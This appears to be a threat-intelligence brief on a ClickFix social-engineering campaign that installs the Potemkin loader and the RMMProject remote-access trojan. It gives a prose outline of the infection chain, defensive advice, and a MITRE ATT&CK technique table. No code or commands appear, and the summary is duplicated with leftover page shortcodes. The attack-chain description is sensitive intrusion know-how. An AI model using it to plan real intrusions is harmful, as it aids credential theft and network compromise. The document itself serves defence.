EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated group that habitually uses the ClickFix social‐engineering technique to gain footholds on corporate networks. It delivers a custom loader that subsequently installs remote‐access tools, classifying the operation as a multi‐stage ransomware‐adjacent intrusion. Targets include medium‐to‐large enterprises in the finance, healthcare, and manufacturing sectors across North America and Europe. The primary objective is to harvest credential stores and browser cookies, then expand laterally to maintain persistent control for potential ransom or data‐exfiltration and espionage.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated group that habitually uses the ClickFix social‐engineering technique to gain footholds on corporate networks. It delivers a custom loader that subsequently installs remote‐access tools, classifying the operation as a multi‐stage ransomware‐adjacent intrusion. Targets include medium‐to‐large enterprises in the finance, healthcare, and manufacturing sectors across North America and Europe. The primary objective is to harvest credential stores and browser cookies, then expand laterally to maintain persistent control for potential ransom or data‐exfiltration and espionage.[emaillocker id="1283"]
The infection begins when a user follows a seemingly legitimate ClickFix prompt in the Windows Run dialog, causing the system to download and silently execute an MSI package. The package drops the Potemkin loader, which uses a deterministic domain‐generation algorithm to locate its command‐and‐control server and reflectively loads the RMMProject remote‐access trojan. Once resident, the trojan creates a Run‐registry entry for persistence, harvests browser credentials, and opens reverse tunnels to bypass outbound filters. Lateral spread is achieved through WMI and SMB execution, while the attacker disables security services to avoid detection.
This threat matters because its use of reflective loading, domain‐generation, and legitimate system utilities makes it hard for traditional antivirus solutions to spot the malicious activity. The ability to disable endpoint protection and maintain hidden tunnels prolongs dwell time, increasing the risk of extensive data loss and operational disruption. Organizations should enforce strict controls on the Windows Run dialog, deploy comprehensive endpoint monitoring, and block outbound connections to unknown domains. Regular audits of registry persistence mechanisms, multi‐factor authentication for privileged accounts, and reliable offline backups further reduce the attack surface and improve recovery prospects.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Execution | T1204 | User Execution | — |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Defense Evasion | T1218.010 | System Binary Proxy Execution | Regsvr32 |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1562.001 | Impair Defenses | Disable or Modify Tools |
| Defense Evasion | T1036.005 | Masquerading | Match Legitimate Name or Location |
| Privilege Escalation | T1055.001 | Process Injection | Dynamic-link Library Injection |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Lateral Movement | T1047 | Windows Management Instrumentation | — |
| Lateral Movement | T1021.002 | Remote Services | SMB/Windows Admin Shares |
| Command and Control | T1568.002 | Dynamic Resolution | Domain Generation Algorithms |
REFERENCES:
The reports contain further technical details:
https://www.huntress.com/blog/potemkin-loader-rmmproject-clickfix-attack
https://cybersecuritynews.com/hackers-use-clickfix-prompt-to-install-msi-package/